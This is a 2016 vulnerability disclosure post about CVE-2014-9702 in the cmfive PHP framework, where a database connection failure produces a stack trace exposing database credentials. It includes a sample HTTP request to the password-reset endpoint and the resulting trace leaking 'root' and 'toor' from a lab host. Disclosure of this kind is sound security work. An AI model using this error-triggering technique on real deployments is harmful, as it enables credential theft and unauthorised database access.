JAHx161 - cmfive database credential disclosure

Posted by Eldar Marcussen on Tue Sep 13 03:53:03 EDT 2016

The following vulnerability was identified by Eldar "Wireghoul" Marcussen.

About

Cmfive is a php framework for creating robust and extensible business applications. It started as a micro framework which was developed by Carsten Eckelmann in 2007 in Sydney on the bus to work, lay dormant for years until it re-emerged as the foundation to the Flow Business System (https://github.com/PyramidPower/flow), which was developed in house to run a 70 people Solar Installation company. cmFive grew from the codebase of Flow, but has since then been shaped to be more modern, slimmer and ready to take on other business applications.

Source code for the framework can be found at https://github.com/2pisoftware/cmfive

CVE-2014-9702 - Informative error messages

Failure to connect to the database causes a stack trace which reveals the database connectivity details in the exception thrown from the PDO class cmfive/system/classes/DbPDO.php on line 23. The following example shows the database user root and password toor being disclosed by shutting down the database before sending the a password reset request:

POST /vvv/cmfive/auth/forgotpassword HTTP/1.1
Host: 192.168.58.130
Proxy-Connection: keep-alive
Content-Length: 103
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://192.168.58.130
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Referer: http://192.168.58.130/vvv/cmfive/auth/forgotpassword
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.8
Cookie: CM5_SID=fab02g0c47aouii6ot48bp2kj1

XiQV1ll8dB=eca52b325d4bef7ff70a9513c64a7669e36af486226e07445f88bd38fe42aeb8&login=admin

HTTP/1.1 200 OK
Date: Mon, 12 Jan 2015 22:29:24 GMT
Server: Apache
X-Powered-By: PHP/5.3.2-1ubuntu4.18
Vary: Accept-Encoding
Content-Length: 577
Content-Type: text/html


Fatal error: Uncaught exception 'PDOException' with message 'SQLSTATE[HY000] [2003] Can't connect to MySQL server on '192.168.58.130' (111)' in /var/www/vvv/cmfive/system/classes/DbPDO.php:23
Stack trace:
#0 /var/www/vvv/cmfive/system/classes/DbPDO.php(23): PDO->__construct('mysql:host=192....', 'root', 'toor', NULL)
#1 /var/www/vvv/cmfive/system/web.php(438): DbPDO->__construct(Array)
#2 /var/www/vvv/cmfive/system/web.php(201): Web->initDB()
#3 /var/www/vvv/cmfive/index.php(16): Web->start()
#4 {main}
  thrown in /var/www/vvv/cmfive/system/classes/DbPDO.php on line 23

Posted by Eldar Marcussen | Permanent link | File under: security, bug, disclosure